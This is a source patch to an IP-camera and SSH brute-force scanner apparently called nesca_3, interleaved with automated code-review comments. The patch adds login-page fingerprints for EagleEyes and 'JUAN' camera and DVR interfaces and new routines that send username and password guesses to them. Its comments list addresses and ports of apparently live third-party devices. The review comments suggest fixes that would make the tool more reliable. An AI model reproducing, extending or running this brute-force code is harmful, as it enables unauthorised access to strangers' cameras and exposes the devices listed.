From f1d0e32ed503cefb0e0c58a0dc0f66a5f65df273 Mon Sep 17 00:00:00 2001 From: cora32 Date: Sun, 30 Aug 2015 17:40:00 +0300 Subject: [PATCH] Multiple fixes --- Connector.cpp | 27 +++-- IPCAuth.cpp | 10 ++ Utils.h | 2 + finder.cpp | 299 ++++++++++++++++++++++++++++++++++++++++++------ mainResources.h | 2 +- nesca_3.cpp | 53 +++++---- 6 files changed, 327 insertions(+), 66 deletions(-) diff --git a/Connector.cpp b/Connector.cpp index 4c79549..962db0e 100644 --- a/Connector.cpp +++ b/Connector.cpp @@ -202,15 +202,23 @@ int Connector::nConnect(const char* ip, const int port, std::string *buffer, if (MapWidgetOpened) stt->doEmitionAddIncData(QString(ip), QString(buffer->c_str())); Activity += sz; return sz; - } else { + } + else if (res == CURLE_LOGIN_DENIED && port == 21) { + return -1; + } + else if (res == CURLE_OPERATION_TIMEDOUT + || res == CURLE_COULDNT_CONNECT + || res == CURLE_SEND_ERROR + || res == CURLE_RECV_ERROR + ) { + return -1; + } + else { if (res == 6) return -2; - else if (res != 28 && - res != 7 && - res != 13 && + else if (res != 13 && res != 67 && res != 52 && res != 56 && - res != 55 && res != 35 && res != 19 && res != 23) @@ -234,10 +242,11 @@ int Connector::nConnect(const char* ip, const int port, std::string *buffer, QString(ip) + ":" + QString::number(port)); }; - if (res == 23 && sz > 0) { - return sz; - } - else return -1; + //if (res == 23 && sz > 0) { + // return sz; + //} + return sz; + //else return -1; } if (MapWidgetOpened) stt->doEmitionAddIncData(QString(ip), QString(buffer->c_str())); diff --git a/IPCAuth.cpp b/IPCAuth.cpp index 9f8e09c..ad98aa8 100644 --- a/IPCAuth.cpp +++ b/IPCAuth.cpp @@ -79,6 +79,10 @@ lopaStr IPC::IPCBrute(const char *ip, int port, char *SPEC) { negVector.push_back("/error.asp"); } + else if (strcmp(SPEC, "JUAN") == 0) + { + negVector.push_back("errno=\"4\""); + } else { stt->doEmitionRedFoundData("[_IPCameraBrute] No \"SPEC\" specified!"); 
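Review bot: In nConnect's error handling the new branches name their libcurl codes while the chain right after them still compares `res` with bare numbers, and one of those, `res != 56`, is now redundant because 56 is CURLE_RECV_ERROR, which the added `else if` already returns on. Spelling the remaining values as their `CURLE_*` names (for example `if (res == CURLE_COULDNT_RESOLVE_HOST) return -2;` instead of `if (res == 6)`) would make that overlap visible. The `CURLE_LOGIN_DENIED && port == 21` branch and the one after it both `return -1`, so they can be a single condition. The function starts and ends outside the hunk.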
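Review bot: The tail of the error branch now returns `sz` for every code that falls through, where it used to return `-1` unless `res == 23 && sz > 0`, so callers that treat a non-negative result as a completed transfer will process whatever partial data a failed request left in `buffer`. If that is intended, say so in a comment and delete the commented-out lines rather than keeping them around the live `return sz;`. If it is not, `return (res == CURLE_WRITE_ERROR && sz > 0) ? sz : -1;` restores the previous contract with the code named. How `sz` is computed is outside the hunk, so whether it can be zero or stale at this point should be checked.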
@@ -174,6 +178,12 @@ lopaStr IPC::IPCBrute(const char *ip, int port, char *SPEC) sprintf(request, "%s:%d/webs/httplogin?username=%s&password=%s&UserID=45637757", ip, port, login, pass); } + else if (strcmp(SPEC, "JUAN") == 0) + { + //sprintf(request, "%s:%d/cgi-bin/gw.cgi?xml=&_=1450923182693", + sprintf(request, "%s:%d/cgi-bin/gw.cgi?xml=%%3Cjuan%%20ver=%%22%%22%%20squ=%%22%%22%%20dir=%%22%%22%%3E%%3Cenvload%%20type=%%220%%22%%20usr=%%22%s%%22%%20pwd=%%22%s%%22/%%3E%%3C/juan%%3E&_=1450923182693", + ip, port, login, pass); + } std::string buffer; Connector con; diff --git a/Utils.h b/Utils.h index beb2002..99cef40 100644 --- a/Utils.h +++ b/Utils.h @@ -7,6 +7,8 @@ #include #include +#define STRSTR(buff, str) Utils::ustrstr(buff, str) + using namespace std; template diff --git a/finder.cpp b/finder.cpp index 4ffdfe2..65f0254 100644 --- a/finder.cpp +++ b/finder.cpp @@ -418,7 +418,15 @@ int sharedDetector(const char * ip, int port, const std::string *buffcpy, const && Utils::ustrstr(buffcpy, "jsmain/liveview.js") != -1 ) return 54; //Beward (http://46.146.243.88:88/login.asp) if (Utils::ustrstr(buffcpy, "get_status.cgi") != -1 - && Utils::ustrstr(buffcpy, "str_device+") != -1) return 55; //QCam (http://1.177.123.118:8080/) + && Utils::ustrstr(buffcpy, "str_device+") != -1 + ) return 55; //QCam (http://1.177.123.118:8080/) + if (Utils::ustrstr(buffcpy, "EagleEyes") != -1 + && (Utils::ustrstr(buffcpy, "/Login.cgi?rnd=") != -1 + || Utils::ustrstr(buffcpy, "mobile480.htm") != -1) + ) return 56; //EaglesEye (http://203.190.113.34:88/nobody/mobile480.htm) + if (Utils::ustrstr(buffcpy, "dvr_remember") != -1 + && Utils::ustrstr(buffcpy, "login_chk_usr_pwd") != -1 + ) return 57; //Network video client (http://203.190.113.54:60001/) if(((Utils::ustrstr(buffcpy, "220") != -1) && (port == 21)) || (Utils::ustrstr(buffcpy, "220 diskStation ftp server ready") != -1) || 
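Review bot: The JUAN branch writes `ip`, `port`, `login` and `pass` into `request` with an unbounded `sprintf`, and the format string is already well over a hundred bytes before substitution, so a long input can overrun the buffer. `request` is declared outside the hunk; assuming it is a fixed char array, use `snprintf(request, sizeof(request), ...)` and treat a return value `>= sizeof(request)` as a failure instead of sending a truncated request. The commented-out `sprintf` line above it is dead code and should be removed, and the literal `_=1450923182693` needs a comment saying what it represents.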
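Review bot: `STRSTR` is a function-like macro defined in a header, so the unscoped name reaches every file that includes Utils.h and adds no type checking over calling `Utils::ustrstr` directly. finder.cpp in this same patch invokes it with a `const std::string *` in some places and with a `std::string` object in others (`STRSTR(location, "http://")`), which only compiles if matching `ustrstr` overloads exist; they are not visible here. Calling `Utils::ustrstr` directly, or adding a small inline wrapper inside `Utils`, would avoid the macro.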
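Review bot: The comments on the new signatures 56 and 57 (like those on 54 and 55 just above) embed the address and port of what look like live third-party devices; a source comment should describe the matched page instead, e.g. `//EagleEyes login page (/Login.cgi or mobile480.htm)`. The labels also drift: the matched string is `EagleEyes` but the comment says `EaglesEye`, and flag 57 is called `Network video client` here and `Juan` in the parseFlag hunk further down. Since the numeric flags are repeated by hand in parseFlag, a shared enum or named constants would keep the two lists in step.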
@@ -428,7 +436,6 @@ int sharedDetector(const char * ip, int port, const std::string *buffcpy, const if (Utils::ustrstr(buffcpy, "camera") != -1 || Utils::ustrstr(buffcpy, "webcamxp") != -1 || - Utils::ustrstr(buffcpy, "video") != -1 || Utils::ustrstr(buffcpy, "ipcam") != -1 || Utils::ustrstr(buffcpy, "smart ip") != -1 || Utils::ustrstr(buffcpy, "sanpshot_icon") != -1 || 
@@ -2408,43 +2415,194 @@ std::string getTitle(const char *str, const int flag) { }; }; } - else if ((ptr1 = strstri(str, "")) != NULL) { + + if ((ptr1 = strstri(str, "")) != NULL) { char *ptr2 = strstri(ptr1, ""); - int sz = ptr2 - ptr1; + if (NULL != ptr2) { + int sz = ptr2 - ptr1; - strncat(finalstr, ptr1 + 6, (sz > 64 ? 64 : sz) - 6); + if (ptr1 + 6 == ptr2) { + strcat(finalstr, "[Empty body]"); + } + else { + strncat(finalstr, ptr1 + 6, (sz > 64 ? 64 : sz) - 6); + } + } + else { + strcat(finalstr, "No closing tag detected."); + } } else if ((ptr1 = strstri(str, "")) != NULL) { char *ptr2 = strstri(ptr1, ""); - int sz = ptr2 - ptr1; + if (NULL != ptr2) { + int sz = ptr2 - ptr1; - strncat(finalstr, ptr1 + 6, (sz > 64 ? 64 : sz) - 6); + strncat(finalstr, ptr1 + 6, (sz > 64 ? 64 : sz) - 6); + } + else { + strcat(finalstr, "No closing tag detected."); + } } else if ((ptr1 = strstri(str, "\r\n\r\n")) != NULL) { strncat(finalstr, ptr1 + 4, 128); } + else { + strncat(finalstr, str, strlen(str)); + } std::string result = ""; - if (flag == 1) { - result = "[PK]"; - } - - result += std::string(finalstr); - return result; -} -std::string getHeader(const std::string *buffcpy, const int flag) { - std::string &result = getTitle(buffcpy->c_str(), flag); - - if (result.size() == 0) { - if (Utils::ustrstr(buffcpy, "redir") != std::string::npos) { - result += "[R]"; - }; - //result += "[Ξ]"; - result += buffcpy->substr(0, 128); + if (flag == 1) { + result = "[PK]"; } + result += std::string(finalstr); return result; } +bool equivRedirectHandler(std::string *buff, char* ip, int port, Lexems *counter) { + if (NULL == buff || 0 == buff->size()) { + return false; + } + + if (counter->iterationCount > 2) { + stt->doEmitionFoundData(QString(ip) + ":" + QString::number(port) + " - infinite loop detected."); + return true; + } + + std::string buffcpy = *buff; + int pos = STRSTR((const std::string *) &buffcpy, "http-equiv=\"refresh\""); + if (-1 == pos) pos = STRSTR((const std::string *) 
&buffcpy, "http-equiv=refresh"); + if (-1 == pos) pos = STRSTR((const std::string *) &buffcpy, "http-equiv='refresh'"); + if (-1 == pos) { + return false; + } + + const std::string tempString = buffcpy.substr(pos + 17); + + int urlPos = STRSTR(&tempString, "url="); + int delimPosFirst = tempString.find_first_of(" \n>\"'", urlPos); + int delimPosSecond = tempString.find_first_of(" \n>\"'", delimPosFirst); + + std::string location; + if (delimPosFirst == delimPosSecond) { + location = tempString.substr(urlPos + 4, delimPosFirst - (urlPos + 4)); + } + else { + location = tempString.substr(delimPosFirst + 1, delimPosSecond); + } + + Connector con; + int newPort = port; + if (location[0] == '/') { + std::string tIP = std::string(ip) + location; + stt->doEmitionYellowFoundData("Redirecting to -> " + QString(tIP.c_str())); + con.nConnect(location.c_str(), port, &buffcpy); + } + else if (-1 != STRSTR(location, "http://")) { + int httpProto = STRSTR(location, "http://"); + + int portPos = location.find(":", 7); + if (-1 != portPos) { + int portPosEnd = location.find("/ \n>\"'", portPos + 7); + newPort = std::stoi(location.substr(portPos + 1, portPosEnd)); + stt->doEmitionYellowFoundData("Redirecting to -> " + QString(location.c_str())); + con.nConnect(location.c_str(), newPort, &buffcpy); + } + else { + stt->doEmitionYellowFoundData("Redirecting to -> " + QString(location.c_str())); + con.nConnect(location.c_str(), port, &buffcpy); + } + } + else if (-1 != STRSTR(location, "https://")) { + int httpProto = STRSTR(location, "https://"); + + int portPos = location.find(":", 8); + if (-1 != portPos) { + int portPosEnd = location.find("/ \n>\"'", portPos + 8); + newPort = std::stoi(location.substr(portPos + 1, portPosEnd)); + stt->doEmitionYellowFoundData("Redirecting to -> " + QString(location.c_str())); + con.nConnect(location.c_str(), newPort, &buffcpy); + } + else { + stt->doEmitionYellowFoundData("Redirecting to -> " + QString(location.c_str())); + 
con.nConnect(location.c_str(), 443, &buffcpy); + } + } + else { + std::string tIP = std::string(ip) + (location[0] == '/' ? "" : "/") + location; + stt->doEmitionYellowFoundData("Redirecting to -> " + QString(tIP.c_str())); + con.nConnect(tIP.c_str(), port, &buffcpy); + } + + ++counter->iterationCount; + + + if (equivRedirectHandler(&buffcpy, ip, newPort, counter)) { + *buff = buffcpy; + } + + return buff->size() > 0; +} +bool jsRedirectHandler(std::string *buff, char* ip, int port, Lexems *counter) { + if (NULL == buff || 0 == buff->size()) { + return false; + } + + if (counter->iterationCount > 2) { + stt->doEmitionFoundData(QString(ip) + ":" + QString::number(port) + " - infinite loop detected."); + return true; + } + + std::string buffcpy = *buff; + + int pos = STRSTR((const std::string *) &buffcpy, "location.href ="); + if (-1 == pos) pos = STRSTR((const std::string *) &buffcpy, "location.href="); + if (-1 == pos) pos = STRSTR((const std::string *) &buffcpy, "location.replace"); + if (-1 == pos) { + return false; + } + + int eqPos = buffcpy.find_first_of("=(", pos); + int spacePosFirst = buffcpy.find_first_not_of(" ", eqPos); + int spacePosSecond = buffcpy.find_first_of(");", spacePosFirst); + std::string subRedirect = buffcpy.substr(spacePosFirst + 1, spacePosSecond - spacePosFirst - 1); + int quotePosFirst = subRedirect.find_first_of("\"'"); + if (-1 == quotePosFirst) { + return false; + } + int quotePosSecond = subRedirect.find_first_of("\"'", quotePosFirst + 1); + + std::string subLocation = subRedirect.substr(quotePosFirst + 1, quotePosSecond - quotePosFirst - 1); + std::string location = std::string(ip) + (subLocation[0] == '/' ? 
"" : "/") + subLocation; + + Connector con; + stt->doEmitionYellowFoundData("Redirecting to -> " + QString(location.c_str())); + con.nConnect(location.c_str(), port, &buffcpy); + + ++counter->iterationCount; + + if (jsRedirectHandler(&buffcpy, ip, port, counter)) { + *buff = buffcpy; + } + + return buff->size() > 0; +} +std::string getHeader(const std::string *buffcpy, const int flag) { + if (STRSTR(buffcpy, "c_str(), flag); + + if (result.size() == 0) { + if (Utils::ustrstr(buffcpy, "redir") != std::string::npos) { + result += "[R]"; + }; + //result += "[Ξ]"; + result += buffcpy->substr(0, 128); + } + return result; + } +} #define RVI_START_FILE "\n\t\n\t\t" void parseFlag(int flag, char* ip, int port, int size, const std::string &header, char* cp) { @@ -2533,7 +2691,7 @@ void parseFlag(int flag, char* ip, int port, int size, const std::string &header char fileName[256] = { 0 }; char date[64] = { 0 }; strcpy(date, Utils::getStartDate().c_str()); - if (HikVis::hikCounter >= 256) { + if (HikVis::hikCounter >= 255) { HikVis::hikCounter = 0; HikVis::hikPart++; } @@ -2567,7 +2725,7 @@ void parseFlag(int flag, char* ip, int port, int size, const std::string &header char fileName[256] = { 0 }; char date[64] = { 0 }; strcpy(date, Utils::getStartDate().c_str()); - if (HikVis::rviCounter >= 256) { + if (HikVis::rviCounter >= 255) { HikVis::rviCounter = 0; HikVis::rviPart++; } 
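Review bot: The new final `else` in getTitle calls `strncat(finalstr, str, strlen(str))`, which limits the copy by the length of the response rather than by the room left in `finalstr`, so a large reply from the remote host is written past the end of the buffer. `finalstr` is declared above the hunk; assuming it is a fixed char array, the call should be `strncat(finalstr, str, sizeof(finalstr) - strlen(finalstr) - 1);`. equivRedirectHandler has the same trust problem in its parsing: the result of `STRSTR(&tempString, "url=")` is used without `if (-1 == urlPos) return false;`, `std::string::npos` results are stored in `int`, and `std::stoi` on the port text throws on non-numeric input with no handler in view. It also passes absolute `http://` and `https://` targets straight to `nConnect`, so the responding host chooses the host and port of the next connection; comparing the target's host with `ip` before connecting would keep the follow-up request on the original endpoint. In the `location[0] == '/'` branch `tIP` is built and logged but `location.c_str()` is what reaches `nConnect`, which looks like a slip for `tIP.c_str()`.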
@@ -2776,6 +2934,14 @@ void parseFlag(int flag, char* ip, int port, int size, const std::string &header { _specBrute(ip, port, "IP Camera", flag, "/videostream.cgi", "Basic Authorization", cp, size); } + else if (flag == 56) //EaglesEye + { + _specBrute(ip, port, "IP Camera", flag, "/Login.cgi?rnd=000148921789481", "Basic Authorization", cp, size); + } + else if (flag == 57) //Juan + { + _specWEBIPCAMBrute(ip, port, "[JUAN] WEB IP Camera", flag, "WEB Authorization", cp, size, "JUAN"); + } else if (flag == 20) //AXIS Camera { if (_specBrute(ip, port, "AXIS Camera", flag, "/mjpg/video.mjpg", "Basic Authorization", cp, size) == -1) { 
@@ -2846,26 +3012,95 @@ void parseFlag(int flag, char* ip, int port, int size, const std::string &header // putInFile(flag, ip, port, size, finalstr, cp); //}; } -int Lexems::filler(char* ip, int port, const std::string *buffcpy, int size, Lexems *lx) +void handleRedirects(std::string *buffcpy, char* ip, int port) { + + Lexems counter; + counter.iterationCount = 0; + equivRedirectHandler(buffcpy, ip, port, &counter); + counter.iterationCount = 0; + jsRedirectHandler(buffcpy, ip, port, &counter); +} +int handleFramesets(std::string *buffcpy, char* ip, int port, int flag) { + if (NULL == buffcpy || 0 == buffcpy->size()) { + return flag; + } + + int pos; + if ((pos = STRSTR((const std::string *) buffcpy, "find("find("find(">", framePos); + + std::string frameString = buffcpy->substr(framePos, framePosEnd - framePos); + + int frameSrcPos = frameString.find("src"); + if (-1 == frameSrcPos) { + frameSrcPos = frameString.find("SRC"); + } + if (-1 != frameSrcPos) { + int eqPos = frameString.find_first_of("=", frameSrcPos); + if (-1 != eqPos) { + int quotePos1 = frameString.find_first_of("\"'", eqPos); + if (-1 != quotePos1) { + int quotePos2 = frameString.find_first_of("\"'", quotePos1 + 1); + + if (quotePos1 != quotePos2) { + std::string location = frameString.substr(quotePos1 + 1, quotePos2 - quotePos1 - 1); + std::string tIP = std::string(ip) + (location[0] == '/' ? 
"" : "/") + location; + std::string buff; + int sz = con.nConnect(tIP.c_str(), port, &buff); + int flg = contentFilter((const std::string *) &buff, port, ip, "UTF-8", sz); + if (flg == -1) { + return -1; + } + } + } + } + } + } + } + return flag; +} +int Lexems::filler(char* ip, int port, std::string *buffcpy, int size, Lexems *lx) { if (port == 22) { _saveSSH(ip, 22, size, buffcpy->c_str()); return -1; - } else if (Utils::ustrstr(buffcpy, "SSH-2.0-OpenSSH") != -1 || - Utils::ustrstr(buffcpy, "SSH-2.0-mod_sftp") != -1) { + } + else if (Utils::ustrstr((const std::string *) buffcpy, "SSH-2.0-OpenSSH") != -1 || + Utils::ustrstr((const std::string *) buffcpy, "SSH-2.0-mod_sftp") != -1) { std::string sshBuff; int res = SSHAuth::SSHLobby(ip, port, &sshBuff); if (res != -1 && res != -2) _saveSSH(ip, port, size, (char*)sshBuff.c_str()); return -1; }; + handleRedirects(buffcpy, ip, port); + char cp[32] = { 0 }; strncpy(cp, getCodePage(buffcpy->c_str()), 32); - int flag = contentFilter(buffcpy, port, ip, cp, size); + int flag = contentFilter((const std::string *) buffcpy, port, ip, cp, size); if (flag != -1) { - const std::string &header = getHeader(buffcpy, flag); - - parseFlag(flag, ip, port, size, header, cp); + if (flag < 2 || flag > 6) { + const std::string &header = getHeader((const std::string *) buffcpy, flag); + if ((flag = handleFramesets(buffcpy, ip, port, flag)) == -1) { + return -1; + } + parseFlag(flag, ip, port, size, header, cp); + } + else { + parseFlag(flag, ip, port, size, "", cp); + } return flag; } else { diff --git a/mainResources.h b/mainResources.h index 54a4859..37715e9 100644 --- a/mainResources.h +++ b/mainResources.h @@ -188,7 +188,7 @@ public: int filler(char* ip, int port, - const std::string *buffcpy, + std::string *buffcpy, int size, Lexems *lx); }; diff --git a/nesca_3.cpp b/nesca_3.cpp index 0c0ebf8..4861488 100644 --- a/nesca_3.cpp +++ b/nesca_3.cpp 
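Review bot: In Lexems::filler, `size` is not refreshed after `handleRedirects(buffcpy, ip, port)`, which can replace `*buffcpy` with the content of a followed redirect, so `contentFilter` and `parseFlag` are handed a length that describes the first response. If they expect the buffer length, add `size = static_cast<int>(buffcpy->size());` after the call. In handleFramesets the value returned by `con.nConnect` is passed to `contentFilter` as `sz` without a check, although nConnect returns `-1` or `-2` on failure; `if (sz <= 0) return flag;` before the call would avoid classifying an empty buffer. The `(const std::string *)` casts are unnecessary, since `std::string *` converts to `const std::string *` implicitly, and handleRedirects constructs a whole `Lexems` only to carry `iterationCount`.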
@@ -2159,31 +2159,36 @@ QList setRow(QString ip, QString loginPass, QString percentage) std::atomic isBAModelLocked = false; int nesca_3::addBARow(QString ip, QString loginPass, QString percentage) { if (!globalScanFlag) return -1; - while (isBAModelLocked) Sleep(10); - isBAModelLocked = true; - BAModel->appendRow(setRow(ip, loginPass, percentage)); - int index = BAModel->rowCount() - 1; - isBAModelLocked = false; + if (BALogSwitched) { + while (isBAModelLocked) Sleep(10); + isBAModelLocked = true; + BAModel->appendRow(setRow(ip, loginPass, percentage)); + int index = BAModel->rowCount() - 1; + isBAModelLocked = false; - if (percentage.compare("OK") == 0) { - BAModel->setData(BAModel->index(index, 0), QBrush(QColor(Qt::green).darker(160)), Qt::BackgroundRole); - BAModel->setData(BAModel->index(index, 1), QBrush(QColor(Qt::green).darker(160)), Qt::BackgroundRole); - BAModel->setData(BAModel->index(index, 2), QBrush(QColor(Qt::green).darker(160)), Qt::BackgroundRole); + if (percentage.compare("OK") == 0) { + BAModel->setData(BAModel->index(index, 0), QBrush(QColor(Qt::green).darker(160)), Qt::BackgroundRole); + BAModel->setData(BAModel->index(index, 1), QBrush(QColor(Qt::green).darker(160)), Qt::BackgroundRole); + BAModel->setData(BAModel->index(index, 2), QBrush(QColor(Qt::green).darker(160)), Qt::BackgroundRole); - BAModel->item(index, 0)->setData(QBrush(QColor(Qt::black).darker(160)), Qt::ForegroundRole); - BAModel->item(index, 1)->setData(QBrush(QColor(Qt::black).darker(160)), Qt::ForegroundRole); - BAModel->item(index, 2)->setData(QBrush(QColor(Qt::black).darker(160)), Qt::ForegroundRole); + BAModel->item(index, 0)->setData(QBrush(QColor(Qt::black).darker(160)), Qt::ForegroundRole); + BAModel->item(index, 1)->setData(QBrush(QColor(Qt::black).darker(160)), Qt::ForegroundRole); + BAModel->item(index, 2)->setData(QBrush(QColor(Qt::black).darker(160)), Qt::ForegroundRole); + } + else if (percentage.contains("FAIL") || percentage.contains("404")) { + 
BAModel->setData(BAModel->index(index, 0), QBrush(QColor(Qt::red).darker(160)), Qt::BackgroundRole); + BAModel->setData(BAModel->index(index, 1), QBrush(QColor(Qt::red).darker(160)), Qt::BackgroundRole); + BAModel->setData(BAModel->index(index, 2), QBrush(QColor(Qt::red).darker(160)), Qt::BackgroundRole); + + BAModel->item(index, 0)->setData(QBrush(QColor(Qt::black).darker(160)), Qt::ForegroundRole); + BAModel->item(index, 1)->setData(QBrush(QColor(Qt::black).darker(160)), Qt::ForegroundRole); + BAModel->item(index, 2)->setData(QBrush(QColor(Qt::black).darker(160)), Qt::ForegroundRole); + } + return index; } - else if (percentage.contains("FAIL") || percentage.contains("404")) { - BAModel->setData(BAModel->index(index, 0), QBrush(QColor(Qt::red).darker(160)), Qt::BackgroundRole); - BAModel->setData(BAModel->index(index, 1), QBrush(QColor(Qt::red).darker(160)), Qt::BackgroundRole); - BAModel->setData(BAModel->index(index, 2), QBrush(QColor(Qt::red).darker(160)), Qt::BackgroundRole); - - BAModel->item(index, 0)->setData(QBrush(QColor(Qt::black).darker(160)), Qt::ForegroundRole); - BAModel->item(index, 1)->setData(QBrush(QColor(Qt::black).darker(160)), Qt::ForegroundRole); - BAModel->item(index, 2)->setData(QBrush(QColor(Qt::black).darker(160)), Qt::ForegroundRole); + else { + return 0; } - return index; } void nesca_3::slotChangeBARow(int rowIndex, QString loginPass, QString percentage) { QModelIndex index = BAModel->index(rowIndex, 1, QModelIndex()); @@ -3132,9 +3137,9 @@ void nesca_3::finishLoading() { CreateVerFile(); - //dtHN->start(); - //dtME2->start(); - //adtHN->start(); + dtHN->start(); + dtME2->start(); + adtHN->start(); #if defined(WIN32) || defined(_WIN32) || defined(__WIN32) && !defined(__CYGWIN__)
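Review bot: The new `else { return 0; }` makes addBARow return 0 when `BALogSwitched` is off, but 0 is also the index of the first appended row, so a caller that later hands the result to slotChangeBARow would edit an unrelated row; `return -1;`, as the `globalScanFlag` check above already does, keeps "no row" distinguishable. Inside the new `if`, `while (isBAModelLocked) Sleep(10); isBAModelLocked = true;` is a separate test and set, so two threads can both pass the wait. `while (isBAModelLocked.exchange(true)) Sleep(10);` closes that gap, assuming the flag is a `std::atomic<bool>` (its template argument is not legible on this page). The `setData` calls on `index` also run after the flag is cleared, so they are not covered by it.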